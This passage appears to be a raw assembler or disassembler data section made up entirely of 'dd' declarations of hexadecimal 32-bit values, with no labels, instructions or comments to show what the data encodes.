		dd 0DC234939h, 7462DE67h, 986D130Dh, 2006E82Ah,	0D71FF4D7h
		dd 494A06BBh, 0D3DEDAEDh, 57302FD9h, 0D7EFF97h,	0FE787647h
		dd 64D4EC8Eh, 1977F5DAh, 0B34A184Ah, 0A18B5842h, 0CC575CB5h
		dd 8789B2EDh, 5AD1252Ah, 722077E5h, 6E5F7D87h, 7ECECFAAh
		dd 3F82EB1h, 0E0F3A15Fh, 0B2DA946Eh, 20CE0AFh, 53CE16E8h
		dd 0D72552EBh, 9F995A2Ch, 0A70AA7D0h, 33495D67h, 0D1556156h
		dd 0FDB5F406h, 287E8B74h, 5859951Eh, 0E6210AF9h, 1259E6F3h
		dd 2E3ED71Dh, 28178DEh,	9643BBF6h, 0F5D865B0h, 0CB33F0DBh
		dd 0F8CB4C3Dh, 0D62B13E6h, 0DE45F0F1h, 63FC4441h, 65163DBh
		dd 0AFCBD964h, 6EB1408Dh, 0D10E374Ah, 192041DFh, 0C1B1596Eh
		dd 50FC30CBh, 279B1AD7h, 3B0EBA54h, 794A12FEh, 0FBF0CE17h
		dd 0B25B6946h, 0BE73E287h, 0F7AAF02Dh, 0CD0BDFF8h, 5252D688h
		dd 1C59C3F7h, 2678B29h,	0C73C3D1Fh, 0A24CF4F6h,	1E5B8C16h
		dd 52D43A1Ch, 320D46A4h, 92A2D329h, 5649E17h, 95A0BB0Ah
		dd 0B5355E0Ch, 483FDE14h, 0F2077D80h, 0AA77FFA3h, 1DEC9CDCh
		dd 3E12FD08h, 3F0B2575h, 17054009h, 0C041456Bh,	0B17CAA2Ah
		dd 6FAF9D9Dh, 0B04EC64Bh, 81C603C2h, 0C5A94BFAh, 0F337B547h
		dd 0A4AE2E7Bh, 6EBF1D9Dh, 4C21741Ah, 240D9576h,	26CAD02Bh
		dd 0D9FCFEDBh, 0BDCA896h, 16B27C3Fh, 7C897D60h,	6F4F671Eh
		dd 1DC73AB9h, 355C1616h, 0BEA138F4h, 0D313666Eh, 115D7543h
		dd 0B5982FE5h, 41D67901h, 753C5FBFh, 0C56422BDh, 0AE1EC81Ch
		dd 0D5F08FFDh, 0ADE4A573h, 82FB18CFh, 0F6A69D3Ah, 769A81CDh
		dd 0B3C43ECFh, 1B7A80EEh, 301C0837h, 6DDDBF85h,	4C1594B4h
		dd 88F77CDBh, 57A1D558h, 1AAFAEABh, 878D2F15h, 4078BFDh
		dd 0EEF2A315h, 225D6FF6h, 1C6FA1DDh, 5746E090h,	4FC0F9B5h
		dd 7F44EA1h, 52A857D9h,	297BA506h, 73E6F04Dh, 0CB57AE09h
		dd 0A459BE73h, 46FA5B9Eh, 0C4BA6ED8h, 0A10380A9h, 368AF034h
		dd 0FF7B87B1h, 7C06A6Ch, 0F28057F3h, 0AA77813Ah, 0BD3EEFB0h
		dd 1C364DAAh, 6AA9C4A4h, 9E688C9Ah, 75AE2972h, 46D5BADEh
		dd 6F47DAD2h, 0E0A5D6BCh, 0D42056Dh, 0AA3B9FA1h, 4BAB3DC7h
		dd 5A3FDFA6h, 0DE597BA2h, 1575BD65h, 75AE49C7h,	0CEBB6574h
		dd 756D31FFh, 0CFB0767h, 0E722E217h, 4417EA54h,	9AA6A58Ah
		dd 0EE43551Bh, 708E7FD6h, 0FDAAD03Ch, 2DA25F23h, 0A288019Eh
		dd 41C1FF94h, 0C09777E6h, 0BA5B2512h, 0B166A070h, 0DDDC4039h
		dd 8DA22667h, 8A6A76Ah,	8D1AC13Ah, 88D0AA30h, 0A47F5BA5h
		dd 0FEF86FA8h, 0F4302C11h, 0D29416D5h, 0A0B4FC77h, 77CCFAA6h
		dd 0B6ED9DA8h, 0FEE7C3DEh, 0BE5CCF5h, 0E1FC08Bh, 0F0950AC4h
		dd 0A0C283CEh, 0C4ABFEC9h, 3E460924h, 0D9DB5627h, 0EBCB2D42h
		dd 9A5DA3F7h, 46532A1Ch, 5EC10A8Bh, 0EB8358D8h,	2938C891h
		dd 4537A9C8h, 0BC4FD0FCh, 7D8A501Ch, 0E157C54Dh, 0B389A69h
		dd 6542C0EBh, 0C8D3FE81h, 3776D1A0h, 89E3166Ah,	12A9C8ECh
		dd 44B1F21Dh, 1B10C31Bh, 4FD56BE3h, 34B299ECh, 0BC9AD4C6h
		dd 0F13512EAh, 505663B8h, 92C868E4h, 0E74F8DD1h, 0D9535B90h
		dd 0DCE0263Eh, 6C7C4517h, 44A7DDCAh, 0BA291F04h, 7660B9D7h
		dd 8D64FD4Dh, 0BFCB3914h, 0F52FF8BFh, 0C26D2D39h, 0FC7FF78Dh
		dd 64EAD402h, 0A52842C0h, 0E54D2393h, 76F74CDCh, 0CFDE5214h
		dd 905B4F0Fh, 0B3BBB955h, 6A5AF21Ch, 7FDAD61Dh,	0C3DBA514h
		dd 0D6F0A117h, 0B9ADE349h, 0B2402064h, 0DDA91363h, 0AA55DBA2h
		dd 0FD2837CAh, 602F29A9h, 0DFE8585Ah, 0BE27AE2Bh, 9B37B166h
		dd 0AF657532h, 3C585A2Eh, 0BE473F9Dh, 0CA76B761h, 0EAF3B858h
		dd 0B76942B6h, 6CD91EEh, 34EBE368h, 0BEC9F8E8h,	8ACDF192h
		dd 0AAB39E2Fh, 8D29EA5Eh, 0E525796h, 50449167h,	326B456Fh
		dd 63159ECBh, 7459A9F2h, 0DD89FF35h, 3EA18FBFh,	54D85ABAh
		dd 0B6548CAAh, 3E3443EDh, 0FA9A1483h, 7B2719B3h, 7EFDF640h
		dd 5A6DF76Dh, 733A7FA2h, 0F033B14h, 93A7891Fh, 2CA9C18Dh
		dd 0B44AFD1Bh, 0FE1ADA23h, 0D188F499h, 0FDBEB879h, 43EEB92Eh
		dd 75C69B5Fh, 8B550E18h, 0CE4B2B25h, 1A37D4E7h,	3351C836h
		dd 0E078C56Fh, 65CB07A5h, 0F735D1AFh, 0E942EF03h, 5AF6798Eh
		dd 1B3A2BF5h, 59032E6Ch, 0F5E2B9D0h, 0CBD76547h, 88DD994Ch
		dd 0D9F4B83Ch, 0FCB95ED1h, 0CD81E1BCh, 7675D659h, 80A1FD6Eh
		dd 0AB64ED16h, 91A525E7h, 69B35087h, 9C0E7563h,	1C0F685Eh
		dd 0C2C77234h, 0FAEE8E8Fh, 0FC786ECBh, 17511988h, 33AABF0Eh
		dd 6562AB79h, 0F7AAFA0Fh, 8A244705h, 9A51735Eh,	0C6A032B3h
		dd 0E02574B4h, 5C21F9B6h, 4684746Ch, 5FDFC44h, 0B1C5A43Eh
		dd 8A3E1400h, 128D2AB2h, 0A3A2E85Ah, 4407459Ch,	8CD63FDBh
		dd 28E5696Fh, 0CE2FB03Eh, 0E46C365Fh, 0FEA9CACCh, 7794D132h
		dd 12041423h, 0B2BB5D6Eh, 8DB8D04h, 292AA17Dh, 4AB8D8A6h
		dd 0FF45AA52h, 0A598E8D8h, 40E64BCFh, 457FE282h, 0CF1E048Ch
		dd 29993E23h, 97F92782h, 3D78547Ch, 0AEA0D3Ah, 88E7FDF9h
		dd 1C1EF295h, 47D9CAFAh, 0B273542Ah, 3B463CA2h,	0CA7DA3BCh
		dd 0EAD2257h, 1B958EA9h, 8759A4D2h, 0C1366FC2h,	94FB1C3Dh
		dd 7531C32Ch, 0AF9E4781h, 0E184DADEh, 44A5CD3Ch, 0A481059Ah
		dd 0A1384360h, 5B9D8D65h, 363672C0h, 0BE35C482h, 0FBB3E802h
		dd 5D4E1313h, 0B55D015Ch, 0E34F1E53h, 3870020Ch, 44B71388h
		dd 45872F05h, 833AF3ABh, 2EBD6710h, 0A119251Ah,	413A2A14h
		dd 5AF314B8h, 0B46D81ABh, 0BE11CED7h, 39B244F0h, 0BCA0576Eh
		dd 7A8CC882h, 0FA495A87h, 3D1C68ECh, 17959FBDh,	0D32F627Ah
		dd 0CFA69F02h, 0DEE14427h, 9FD992F5h, 86EB14D4h, 3E72F720h
		dd 58F8F81Eh, 0C3C9E13Ah, 48F63B07h, 3D8C5470h,	0FF04E95Dh
		dd 65EC9234h, 7AE47319h, 0D6FDBC4Ch, 0FC8C57CEh, 1D766410h
		dd 0DE556CA7h, 155DB34Bh, 65B6F403h, 3ADDA9EFh,	3F1B58EAh
		dd 711E94Ch, 1AEE3F8Bh,	0C88E233Ah, 20BB07EFh, 0DA215DBCh
		dd 7503BCDEh, 27E497AFh, 8AFC03C2h, 6F33C84Dh, 9100B916h
		dd 0CE85BD3Ah, 56E6DFCh, 0AEA8F321h, 28C6033Ah,	7918E96Bh
		dd 0FE65607Ch, 557CC863h, 1407C7DFh, 820289FEh,	0A16B0BC0h
		dd 13E0D19Eh, 3C537061h, 0BBA6BA6Eh, 11BE5CA2h,	7D49865Ch
		dd 6D0C9265h, 2C053A39h, 0B4A89A7Ch, 56F274FAh,	34EC2F83h
		dd 5EC005h, 0D3C8A3BFh,	0CA522E93h, 3744FA95h, 69F6EC1Ch
		dd 2751265Dh, 73A0049Dh, 0FC18AF8Ch, 9E64A981h,	0D756B64Bh
		dd 6DBDA532h, 5C289B4Fh, 512C55CFh, 597FAD1Bh, 75D12052h
		dd 7CDC0F4Ah, 0D5DC1A6Bh, 0DC91D7E7h, 0A2DAD3FBh, 0D7B6DD0h
		dd 0A130D7Ah, 0CFB33931h, 7DBF74Dh, 6FEB8426h, 0BFDC5B98h
		dd 6DDC4FACh, 93FDC20h,	152F2922h, 0F3675D2h, 0EBF43A5Ch
		dd 0AA751D22h, 141CCBF3h
		dd 98DF6D5Ch, 7515785Ah, 0D1BFBC07h, 4BBDC0B8h,	51F9E2BCh
		dd 7BC70D7Fh, 2D732AE1h, 0A6522AB9h, 5F4DF82Dh,	0EAEDAC42h
		dd 504EDAA1h, 0D447B466h, 0CD3663A9h, 7EF8FD1Dh, 0C6E18C79h
		dd 9D564B5Fh, 35EB68CDh, 0C5C91349h, 0CAB97130h, 50B5278Bh
		dd 0EE52D199h, 762EA0ABh, 0F4E86CAAh, 0ABCEF7B5h, 42152550h
		dd 0BF5A19F6h, 8AF3408Ah, 0DD3A59D4h, 0A3168281h, 9F1EDA6Bh
		dd 4330EFF5h, 0ADD2E820h, 2FE13F1Fh, 0BD9063CFh, 194F9576h
		dd 0FE5B32FCh, 55367377h, 0A1F21195h, 1AF78680h, 68DAECE0h
		dd 1E6F272Bh, 45E72DC6h, 5E93C1F3h, 13736BE9h, 0C426E5C4h
		dd 0BFC4F57Ch, 5CCE7D2Fh, 6463296Fh, 0E17F18E6h, 2B0A11BEh
		dd 4D53D47Fh, 9C2F9F82h, 8D3D8A35h, 9084DAC7h, 7F918B2Ah
		dd 0D8C4A3C5h, 0BD3AA9CFh, 8DEC9479h, 0D7B4C129h, 0A075E46Ah
		dd 0D79F2E1Ah, 2B2556ACh, 0B6FAEDA6h, 977883Fh,	0FC1F6D7Dh
		dd 0E691E3D0h, 0AE38F246h, 5CB7F6E7h, 0F062A556h, 0FE807218h
		dd 412E204Ah, 2411C8A4h, 54AE05DEh, 2CCBD794h, 0B512BFADh
		dd 550159Ah, 13BECD4Fh,	0FD9DB9A4h, 2ABD580Eh, 2DB1C8F3h
		dd 3B033E87h, 747D495Fh, 35A4C6D5h, 74F99D60h, 1F9E7B97h
		dd 32B7AA6Ah, 0CDA86D87h, 68AA81E1h, 51D43D17h,	0F78EA7A4h
		dd 3EC4E3C0h, 0D55DE34Ah, 0B1158B62h, 0AFF7862Bh, 97A75B2Ch
		dd 416615DAh, 7429FC7h,	46B3A657h, 77E21A7h, 2BB6DF2Dh
		dd 0C0FA1F5Eh, 52D4191Bh, 0C4DCBED0h, 0A5E34051h, 3C719EE8h
		dd 2A45A24Bh, 833571A9h, 69B03A2Ah, 90C4B012h, 0FA93FACAh
		dd 0F1672619h, 214F17E4h, 216ED5E5h, 3C734C7Ah,	0FC38CFA9h
		dd 0A14762D1h, 78843CCCh, 0EB9B3853h, 8D09DB10h, 31C10DD3h
		dd 747836EEh, 0CDD4E029h, 0AF9626F7h, 0D477B0B9h, 0EC71215h
		dd 0D0ADE086h, 0C24832D9h, 171A98h, 76AA5F6Ch, 29666E93h
		dd 0AB564B0Eh, 5AAAC33Eh, 5409B6A2h, 177F9B85h,	4B70767Fh
		dd 547B2AB2h, 0B0B606BAh, 5FCB3B68h, 26CFD9CEh,	0EEE6D38Bh
		dd 81A44CD0h, 4D7D21F1h, 822BB97Ah, 0A6AAA51Bh,	0A764EE4Eh
		dd 4B8AC8FFh, 4805AFE5h, 0AA56BE86h, 6686B988h,	3A5A8A17h
		dd 0A57826DFh, 0F92A9866h, 5C363AA6h, 0B8CE6DD9h, 0D58540A3h
		dd 6CA3AAF5h, 0BEA8E881h, 0C156E602h, 0AD17ED41h, 9789C4F0h
		dd 0CED452CAh, 6EAC20ADh, 1E088548h, 0BCC57E14h, 0C8E3E2ABh
		dd 0A375C1F9h, 64935958h, 0FE630461h, 0A7073890h, 3E7AF0A8h
		dd 0E17DAC29h, 84E47814h, 4B31A02Bh, 6B162EAFh,	51952FCCh
		dd 62BFAAF2h, 8FB7B201h, 0E002E35Ah, 431F25BFh,	58344818h
		dd 0AF16CAE4h, 616A907Dh, 75C2F5D4h, 0D6F68C85h, 423E0B57h
		dd 0E58C7DEh, 44531729h, 7DB1A17Fh, 96D155ECh, 44F76995h
		dd 99B704C0h, 0A918AEEh, 2D3221Dh, 4F81C902h, 0E5AAE3A1h
		dd 3EB1A4C5h, 4CB28ABDh, 3C23F65Eh, 0A6E2B50Ch,	168D16EFh
		dd 0E3B17E22h, 7E41B6D6h, 0DEC4AD29h, 0C848E3D1h, 0F08D2D75h
		dd 7DA80C2Ch, 0F9D89CC9h, 5B33C081h, 0A93EED14h, 6B4EA80h
		dd 0BA285544h, 0C9D2562Fh, 7F0F52B0h, 4ED13F8Dh, 7BAD29A6h
		dd 5B2F3D7h, 0E87D6A9Bh, 0FCF6E164h, 6E07CBABh,	0E97EDEBFh
		dd 8E4BC555h, 4B7BF456h, 0F46DC268h, 780B7C4h, 310A20D1h
		dd 2BEF06Ah, 114393Ch, 309DB7D2h, 0A5A57D3Ah, 2E9D294Eh
		dd 89A71F4Ah, 0A1A9334Eh, 0E8325953h, 3AE8D014h, 4E8A7411h
		dd 53A19D34h, 24E82745h, 313BE9D1h, 0B4E8A74h, 44132E9Dh
		dd 0D7348527h, 7409A129h, 94B8E82Ah, 8E823A06h,	3E808E78h
		dd 6AF9031Dh, 10659C5Fh, 0AED4DB00h, 0F88B88C2h, 0FF9ECD94h
		dd 0FEF15717h, 89754A40h, 0B539B5DBh, 0C6271CC4h, 0D7390C54h
		dd 0B01F99C8h, 0E2321D89h, 0CE3211D3h, 0E148134Ch, 0FFC72EEAh
		dd 0FAEB00CAh, 36EB01h,	298B974Bh, 58DC9A51h, 9AA59DB6h
		dd 0AA3602AEh, 456B7486h, 0DC568B5Fh, 567514D9h, 2CCA3620h
		dd 24A673EDh, 67A57E05h, 0A1EEA705h, 925A6400h,	30B930F3h
		dd 976DA227h, 0CEFF8E92h, 0A9F62BDAh, 36082203h, 5E865A26h
		dd 0D651C1Dh, 117D3CBAh, 0EE674965h, 2FDB7B1Ch,	4C555775h
		dd 8386DB50h, 57DBF96Bh, 12DFD3B4h, 491B9D2Dh, 61F8BB8Bh
		dd 25548AD6h, 0D31F8C04h, 0EA6E9345h, 99A1BFBFh, 0F761E39Bh
		dd 0C7ED64C1h, 0DDED18C4h, 0C48707FDh, 0AB352B8Eh, 0A85B7BC3h
		dd 0CB7C49CBh, 0FAC32BC0h, 0E8F1B4FDh, 4F93D999h, 0DD7EDD2Bh
		dd 964BFCFEh, 2E096AFEh, 435B12FBh, 0E4BA143Eh,	0C5F0B76Ah
		dd 8E37ECD5h, 5AD2BB8Fh, 0BA82CDEEh, 78A17DD8h,	99F4D55Ch
		dd 1B3D1180h, 0E8BA4C2Dh, 3D445EDAh, 338EC7E1h,	0E5BFB725h
		dd 9E82FC56h, 0A56E7CADh, 4FF5760Eh, 0D15B10FCh, 5498E732h
		dd 0BC52CCADh, 46FB7888h, 0C4BDAB28h, 596800EBh, 0DC02AEA6h
		dd 0BF6DE6E9h, 5F7E4B63h, 5CAC1C69h, 3C2FE765h,	8C3F48E6h
		dd 0F7B6ECDDh, 0A2DFA3FDh, 0BBA16400h, 96AE6EA1h, 0EBE5710Dh
		dd 4CAA23A1h, 6FD042D1h, 41A9E272h, 0E47DC75Ah,	0CA60A797h
		dd 0F78A21DAh, 88FCA2E1h, 0DCBB281Dh, 22E4CBFh,	0F7C5E915h
		dd 0F07996EAh, 0ACD5CB8Fh, 0BC7510A0h, 0C2A85068h, 0BAD803EFh
		dd 3E9F8541h, 70781F14h, 4523FAAEh, 0A5ED50C3h,	0CCD0F32Ah
		dd 0E0A24213h, 9F07EC53h, 0C2AAB931h, 0B26FBE3Bh, 9A9FDF45h
		dd 23DEDC05h, 9EE9C87Ch, 825605Bh, 0F00B7174h, 3C62A251h
		dd 0CDAEA3D1h, 0AAADE97Dh, 0AFAE432Fh, 3FE88F05h, 1F8A4803h
		dd 5DD8C792h, 15A88B52h, 0E42359ADh, 0BC79EF26h, 3ABBD80Dh
		dd 0C728551Fh, 3CF21FDCh, 0A82F6B48h, 0F1523C79h, 26FD81A5h
		dd 64F9AADAh, 0D3B156Fh, 7661E9DBh, 5D4F5405h, 0C92EA4E0h
		dd 1F467BCAh, 688088D7h, 0AEE0BAA9h, 4C5CAB2Ah,	9D20F810h
		dd 61ACA005h, 28686EB7h, 70150ABEh, 0EB51F8F3h,	7ABE0FBh
		dd 6595BFC6h, 0ECF42EF5h, 94E1D5BFh, 0DFBE3F1Bh, 0D16E29C6h
		dd 0B9159820h, 2276E02Bh, 5FF7EDA5h, 2141ED43h,	0B7AA0BFCh
		dd 0ACAAAB05h, 0AC5EA4E9h, 0FBA99FE3h, 0E9219FBh, 8DAEDD35h
		dd 1EA6F108h, 0EB592859h, 3FD3657Eh, 543CD229h,	9A956B75h
		dd 0E01A496Eh, 5DD124BBh, 0D31D278h, 0BB03C4F7h, 64612F55h
		dd 2DA3D2CAh, 0D4A0B800h, 86694DD5h, 0BA8B204Eh, 903512A8h
		dd 4CC0F176h, 36DED3C0h, 7513F3B1h, 0BC72FAF6h,	8A55FDAFh
		dd 28268BE8h, 6D2EED1Ah, 0E75AA332h, 56379F28h,	8E366F22h
		dd 0DDE9A17Ah, 24E514BFh, 0EE2262D1h, 9FD76D32h, 174B1A6Eh
		dd 42FA2819h, 0ADCE4FDBh, 7885C109h, 0CA9DF0D7h, 5674A3B3h
		dd 83CDA0A6h, 0F1406FF3h, 0CA6C6B45h, 6BB6230Fh, 1A68F2F3h
		dd 6073D9ADh, 0CFD19D37h, 0A7238719h, 0BD4630CBh, 6A83738h
		dd 2BAF8381h, 0E04DA2Eh, 48E97CA6h, 0E2C4FD1Ah,	0FA99BEBh
		dd 3E340742h, 371ED7AEh, 90DC8390h, 33990A7Fh, 53950F8Fh
		dd 649F7C36h, 0B127DFCAh, 15BBE95Bh, 0C4C1B640h, 7868FE1Bh
		dd 0A3B55514h, 0F2A2ADA0h, 0CFAF0243h, 1EEDB3Dh, 79D7FD2Bh
		dd 9354095h, 5741C5EBh,	78C1EC47h, 41F5DA95h, 38B0FE02h
		dd 0D3662D62h, 4F62DE9Dh, 341E3DBCh, 0D053B226h, 9637F542h
		dd 0E244A7F7h, 653B054Bh, 535FAF67h, 3D3355A8h,	59F1E655h
		dd 5BCA9381h, 2D7FBC80h, 0F36D8D83h, 552D581h, 0CD4CB99Ch
		dd 0DA17D13Fh, 0A7E652B1h, 59E0E8A8h, 5A10D1BDh, 0E5C28EABh
		dd 4BF2B1D4h, 791E4D7Eh, 0C0823ABCh, 0EDB33BEFh, 7C793B9Ah
		dd 7720E860h, 38B3A945h
		dd 0E8C4A071h, 387EF9EDh, 5C52BAFAh, 5B3E270Bh,	2404DDA1h
		dd 2E070F2Eh, 0ED613D6Fh, 5A138B4Dh, 7CBF1768h,	0F4F75F72h
		dd 19C7AE3Dh, 7ECE56A3h, 63BEE4D4h, 0D58BC7ECh,	8616BBEDh
		dd 548CE472h, 0D3B6F0CAh, 9491206Bh, 0D095EB32h, 0E3F8E788h
		dd 34EADC68h, 0C2FDA687h, 272AAED6h, 8FDCA94Ch,	0AD2C0416h
		dd 0E93EE1DBh, 0F339C1Ch, 5DDB1C37h, 0B71FA863h, 48A79514h
		dd 8FA3F436h, 550EB21Fh, 60A7C99Eh, 5B0099F5h, 87E60722h
		dd 0B12E2C35h, 0BB78AE0Dh, 5BC21DA3h, 7F15D2E3h, 496D8C60h
		dd 147C1844h, 0EF20BBA7h, 0B285B24Ch, 345222E4h, 7431144Bh
		dd 94AC278Ch, 0ECEA694Fh, 940C9690h, 7889D515h,	4AEFE55Ch
		dd 0AE05DE7h, 59AE9C15h, 80A5E6D9h, 20A5F0A0h, 1B1BEB77h
		dd 5FA777CAh, 198D2E0Bh, 412531DDh, 6FB1804Dh, 0C0F750FCh
		dd 1F3ED0F0h, 6C11FAD4h, 78F7DC1Bh, 0DB42981Fh,	0B4956E52h
		dd 9686F465h, 9DCDFA10h, 0B283E968h, 0C7F076BBh, 0FC07E9C5h
		dd 42146E50h, 1C788D55h, 0D77AF37Ah, 74E9A467h,	3C69A70Dh
		dd 27B13525h, 3DB3C1ABh, 56D14AF3h, 0D5DF9F55h,	0A5FF4DFEh
		dd 9C2F4E80h, 0E29D63A3h, 98DB315Ch, 0DBDFCAD0h, 0ED4364C0h
		dd 0C362D307h, 770B90Fh, 258BF7CDh, 0D7CCD4D8h,	0C8DCD216h
		dd 0CB78DDE1h, 0A0ED0513h, 0A3FFC3B6h, 51D686B5h, 0F2DB7AFCh
		dd 4A36C533h, 3BB43D90h, 0F0D17D73h, 1CFABB9Bh,	7CCAD8D9h
		dd 8EA2A3AFh, 0E8DF16D5h, 9106C00Dh, 77042EB1h,	8C714515h
		dd 3CCC8055h, 0EF447EFDh, 9DE24CA1h, 66167BE1h,	0B8570CA3h
		dd 363FE80h, 10F4C197h,	1C7C77D3h, 45FA57A1h, 6ABBA8B8h
		dd 0FEA37E18h, 0F2F671B2h, 0E5462753h, 43C58D9Ch, 0DBB426A7h
		dd 0EA691623h, 21C3557Bh, 392A361Bh, 5A7D87E2h,	0E525B4F9h
		dd 7AE95A82h, 836B57B4h, 7D33FCE7h, 0A789DE01h,	5FF32D4h
		dd 99C34EE5h, 0BE7E6243h, 75EFF689h, 47BBD6A5h,	5102D6B4h
		dd 1C1E57D7h, 8906E7E8h, 0EFBFAA16h, 7F3BC867h,	4727995Fh
		dd 0E4A381E7h, 6584851Bh, 37379D9Ch, 88DEF6E1h,	0BAB9FDE0h
		dd 8BB36B74h, 4EE92096h, 7F06B56Bh, 0C0F981Fh, 9D7E81A1h
		dd 0FFDB3C9Bh, 0E281AF17h, 0BB89BC73h, 397F3B47h, 8FA4E6CBh
		dd 61E8B8ABh, 0B499E6BBh, 0B72936C9h, 532C72CFh, 8C9D46AFh
		dd 0E2C8ABFBh, 2B5E5DD8h, 5E9EAFAFh, 51E02A0Eh,	0D715B333h
		dd 0BEEF2F0Ah, 6E951513h, 77D59A29h, 3F7B5A28h,	0F37CE46Fh
		dd 0EC072495h, 0F6850A9Dh, 0F6ABEFC3h, 0A05063D7h, 55DD9368h
		dd 897FB5B3h, 8D266854h, 0F8D2848Ah, 0D555507Ch, 0BBE2D0C4h
		dd 1B71CC12h, 0E7389146h, 0E9CC248Bh, 0F09BEACBh, 0EFD9A6C3h
		dd 1F09BE28h, 39BC2E7Ch, 0B6FEC3Ch, 5C5AC944h, 6301C09h
		dd 0CF7C9287h, 18E55B05h, 6A85B02Dh, 561FF4A7h,	0D1571A26h
		dd 8FE089B8h, 0E2226AE8h, 5B22231Ah, 0E43FB2C1h, 0C497BE8Ah
		dd 7D924961h, 6C44F0E4h, 3F02BD08h, 0F0BEB592h,	2884FA25h
		dd 0FAD24EF6h, 0AAF1B599h, 0D1A8EEE6h, 0E5092F6Dh, 0D1414CBFh
		dd 0D2FA6666h, 6E7610CDh, 6220CA74h, 0B5EFA95Bh, 29F68F2Ah
		dd 0A3B0B4D9h, 0CCFEC7AEh, 0A072A281h, 81E8F46Ch, 0A7557655h
		dd 29866AE5h, 54F541FAh, 79CC9199h, 520F3470h, 8CCC0F8Bh
		dd 0A369AF6Ch, 7C294FBAh, 9CBE4E83h, 2874A3Ch, 27741DCEh
		dd 522D60E5h, 0CEB1E5B3h, 0DB3BFF73h, 9EEC5968h, 0E6EEEC76h
		dd 9A577674h, 3DD69CF1h, 6EDE7AE3h, 38CCD088h, 57F4D205h
		dd 45087021h, 996ADA2h,	160DCAF2h, 9A5ED1Ah, 0FEE1FADCh
		dd 0A118F0CCh, 0AD060374h, 2316E055h, 0E7EDABCAh, 0DB41E039h
		dd 80253380h, 56589D3Fh, 0F9F0FB6Dh, 0BF1D24CAh, 0EA55D7C4h
		dd 8D77A57Fh, 86D94F36h, 0D00CF243h, 0DDEDDD39h, 7DD2C963h
		dd 0E2EC4C8h, 914A92D5h, 0CAFE8A06h, 2F7416F8h,	980CFD3Ch
		dd 1775097Bh, 81B4CBFh,	3C32356h, 6E713DCBh, 732BEBD9h
		dd 0CFD850Ah, 56F4B052h, 29FCE331h, 32A22DDEh, 0C629C577h
		dd 13907119h, 8C99D735h, 89DFA5C9h, 95FB70C4h, 0EC086B58h
		dd 4E3878BAh, 593D28B6h, 5A2F7555h, 0E0A015A9h,	2C38487h
		dd 4A3ECE80h, 24ADE42Ch, 1F43527Fh, 0CCBE0C1Eh,	0DDBAFE6Fh
		dd 96AA4750h, 64BEE842h, 0D1252ACEh, 0A98AE78Eh, 0FB2C3EB8h
		dd 1C0C11A3h, 57960B2Fh, 0DD71740Bh, 2DA65382h,	0EEDBE16Bh
		dd 0A86A0AD8h, 0C3D7ACBBh, 37CA4C65h, 205B94B0h, 80AF6F67h
		dd 0BAA6EAC7h, 4F078E92h, 0FFF4EA91h, 0E556F7DEh, 3CFEA347h
		dd 7EC54D58h, 2BCBAB2Bh, 0EAA77C0h, 292D8418h, 1AC365F1h
		dd 5558F92Dh, 58EA695Bh, 5FD51E75h, 130004DAh, 665F57DBh
		dd 0E8D9D6BFh, 0BB494866h, 61B6D59Bh, 3EFD187Fh, 0AE6090F2h
		dd 0AA56501Dh, 0CE8BDA5Ch, 25DF9459h, 8BBCAADDh, 92BA100Ah
		dd 4EB298F5h, 5A6E1BD3h, 3AEE8706h, 0D0AB13FEh,	6B4DEEB9h
		dd 6625E561h, 65D3DF0Fh, 0F02A4811h, 0CE58CBA0h, 0ED1E5557h
		dd 3F72DD54h, 4427AC95h, 7C30BE95h, 9A61CFB5h, 37B688A8h
		dd 3BE9ED78h, 0A83ECF45h, 0FA1A7FF9h, 0F99F627Ch, 299A7DA3h
		dd 7597979h, 0D285A87Eh, 0B19A3075h, 54D6E2D2h,	4A5825F5h
		dd 0E92DBFD3h, 7E1A0AEAh, 2C69DE9Dh, 62BCBC95h,	0AB5A97D9h
		dd 42EF62D8h, 3D7FEB95h, 9A439B85h, 9BE04536h, 8ECB820Ah
		dd 87C583Ch, 488EE02Dh,	6BB0EB55h, 0FA3792D1h, 0A4538DB7h
		dd 0ADC73D6Ch, 7D92CC08h, 0D3D15C05h, 0EA56B4B0h, 83F8D092h
		dd 34E9CB4Dh, 0F2BE8F70h, 0EB684B64h, 0BA31D607h, 6B1DDD6Ch
		dd 0EBA4B5B7h, 8D97555Fh, 55696BD3h, 0E221B244h, 0B6DCBCDDh
		dd 79D6FACh, 0F29028F7h, 1497422Fh, 735FDA61h, 58D65ECDh
		dd 0B2B0C8Ch, 8547C5B7h, 0F85E6290h, 910C64FCh,	50ADAAA5h
		dd 0E55B4507h, 0E6C7CD10h, 0F6AD47C1h, 0C6FAE56Ah, 5EFF5194h
		dd 186310FCh, 0EE4A1AB9h, 5D70B3E0h, 0B8877D3Ch, 0B6397222h
		dd 0F4AE9FEDh, 5BE4D744h, 1ED4599Dh, 40978C29h,	5E1B1B53h
		dd 98ADEA26h, 46BC9D99h, 0DA8F43F0h, 968D01C7h,	274D6773h
		dd 361705C6h, 917F5C0Ah, 40E04BF7h, 7DCA45AAh, 2ABA050Bh
		dd 912BDEFAh, 0E9A87F41h, 0F81F2C83h, 0F5A8C467h, 42608652h
		dd 0FAAECFB7h, 0B4A9B124h, 555D89C9h, 0D7BEC3F1h, 5FF43A97h
		dd 53E53342h, 9C592DB4h, 956675B3h, 32955723h, 0E3FDF9B2h
		dd 4DA0294Dh, 55E4C8DFh, 0B9E12D77h, 0CBFF0A8Ah, 1A6C6A34h
		dd 0AAF694B7h, 1BFB5827h, 12B28C16h, 2ED46B04h,	0B181B81Fh
		dd 0E45746A2h, 0AB4A3BC6h, 8BFC4BE2h, 4F6D844Bh, 27197A7Ah
		dd 8A65E4BFh, 0AF2B23B5h, 0C3978EF7h, 2202C1E3h, 0B6B57E17h
		dd 8C81BD8Fh, 6463790Dh, 0C6EFA62Dh, 9BD9A738h,	0F0EBE80h
		dd 0A509DA09h, 126D724Dh, 2637A785h, 0DBC8F545h, 8F0AD43Fh
		dd 0BBC5E213h, 32F621CFh, 0F13615CFh, 2EB38A43h, 0AA05AF46h
		dd 82ABBC91h, 8B242697h, 0D275A96Bh, 0EEE0D44Eh, 4AB4D34Eh
		dd 0CC4985Fh, 88166A00h, 2311B776h, 43E1D142h, 2197BFA2h
		dd 0B6F36AA9h, 9A46DA91h, 0B1F20836h, 0CBAE80E7h, 524F377Eh
		dd 5E44F73Ah, 552F5E9Bh, 0DAD18BA3h, 4374AA07h,	6A77FC9h
		dd 30EF95A5h, 0CD545255h, 3EB90386h, 6E140D91h,	0AB1C9C1Eh
		dd 0D92127Bh, 63208FE6h, 0ADFBA88Dh, 0B9D55F8Fh, 0B8D3E979h
